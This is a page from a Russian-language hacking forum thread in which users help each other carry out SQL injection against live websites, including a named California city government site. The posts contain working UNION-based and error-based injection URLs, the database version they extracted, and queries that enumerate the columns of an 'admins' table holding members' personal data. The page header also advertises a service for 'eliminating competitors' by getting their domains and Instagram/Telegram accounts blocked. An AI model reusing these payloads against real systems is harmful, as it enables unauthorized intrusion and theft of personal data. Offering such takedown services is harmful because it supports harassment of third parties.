УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1571 из 2438

1571

Опции темы

Поиск в этой теме

Опции просмотра

#15701

26.11.2010, 14:44

h3xf0x

Guest

Сообщений: n/a

Провел на форуме:
1179

Репутация: 0

Всем привет.

Подобрал количество полей. Как я понял вывод одного поля.

http://imperial.ca.gov/dept.php?id=-1+order+by+1

Но если попытаться вывести поле пишет ошибку - different number of columns

http://imperial.ca.gov/dept.php?id=-1+union+select+1

т.е. возможно, что здесь 3 версия MySQL?

Как нибудь инфу можно вытащить?

Или где почитать про это можно? Спасибо.

#15702

26.11.2010, 14:45

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

h3xf0x, в 3 union нет.

возможно несколько запросов, методом тыка подбирайте или выплевывайте в ошибки, ну или как слепую уже крутите.

а в title что

http://imperial.ca.gov/dept.php?id=-32+union+select+version()--

:: City of Imperial - 5.0.27-community-nt ::

#15703

26.11.2010, 14:52

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

Цитата:

Сообщение от h3xf0x

h3xf0x said:
Всем привет.
Подобрал количество полей. Как я понял вывод одного поля.
http://imperial.ca.gov/dept.php?id=-1+order+by+1
Но если попытаться вывести поле пишет ошибку - different number of columns
http://imperial.ca.gov/dept.php?id=-1+union+select+1
т.е. возможно, что здесь 3 версия MySQL?
Как нибудь инфу можно вытащить?
Или где почитать про это можно? Спасибо.

Error Based метод:

Код:

Code:
http://imperial.ca.gov/dept.php?id=-1%20or%201%20group%20by%20concat((select%20version()),floor(rand(0)*2))%20having%20min(0)%20or%201%20--%201

Цитата:

Сообщение от Strilo4ka

Strilo4ka said:
h3xf0x, в 3 union нет.

2Strilo4ka, версия там 5.0.27-community-nt

#15704

26.11.2010, 15:07

h3xf0x

Guest

Сообщений: n/a

Провел на форуме:
1179

Репутация: 0

О! Всем большущее спасибо! А в тайтл то я и не догадался посмотреть =)

#15705

26.11.2010, 21:45

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

Цитата:

Сообщение от None

О! Всем большущее спасибо! А в тайтл то я и не догадался посмотреть =)

на будущее-смотри исходный код страницы...

#15706

26.11.2010, 23:18

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

В таблице 59 колонок:

http://www.site.com/index.php?id=-23+union+select+1,count(*),3,4,5,6,7,8,9,10+from+i nformation_schema.columns+where+table_name=admins+--+

59

Запрос вывел только 33 колонки.

http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name!='admins'+and+column_name>'NewKateg orie4'+--+

Mitgliedsnummer,

Titel,

VorName,

Name,

Firma,

Adresse,

PLZ,

Ort,

Land,

Tel,

Mobil,

Fax,

EMail,

BCEMail,

Internet,

Zustelladresse,

BName,

Beschreibung,

Leitspruch,

Branche1,

Branche2,

Branche3,

Branche4,

Branche5,

Kategorie1,

Kategorie2,

Kategorie3,

Kategorie4,

Kategorie5,

NewKategorie1,

NewKategorie2,

NewKategorie3,

NewKategorie4

Помогите исправить ошибки в запросе, чтобы вывести остальные имена колонок в таблице через group_concat() не использую limit:

http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name!='admins'+and+column_name>'NewKateg orie4'+--+

#15707

26.11.2010, 23:31

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name!='admins'--

если каунт выводит 59 эт не факт что на вывод будет колонок 59....

#15708

27.11.2010, 00:13

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

Провел на форуме:
2212846

Репутация: 56

FlaktW

http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name='admins'

http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name='admins'+and+column_name>'посл� �дняя выведенная колонка в предидущем запросе'

#15709

27.11.2010, 00:15

Чакэ

Guest

Сообщений: n/a

Провел на форуме:
90728

Репутация: 62

FlaktW кагбэ у функции group_concat() есть ограничение в 1024 выводимых символов.

#15710

27.11.2010, 00:44

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

Провел на форуме:
568388

Репутация: 87

Все повторяется..

уже годами так.. одни и теже вопросы и ответы.. вопросы... одни и теже ответы

+ одни и теже цитаты с "sql inj. faq"

Цитата:

Сообщение от None

у функции group_concat() есть ограничение в 1024 выводимых символов

даже это уже было уже сказано 10005000 раз..

Страница 1571 из 2438

1571

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход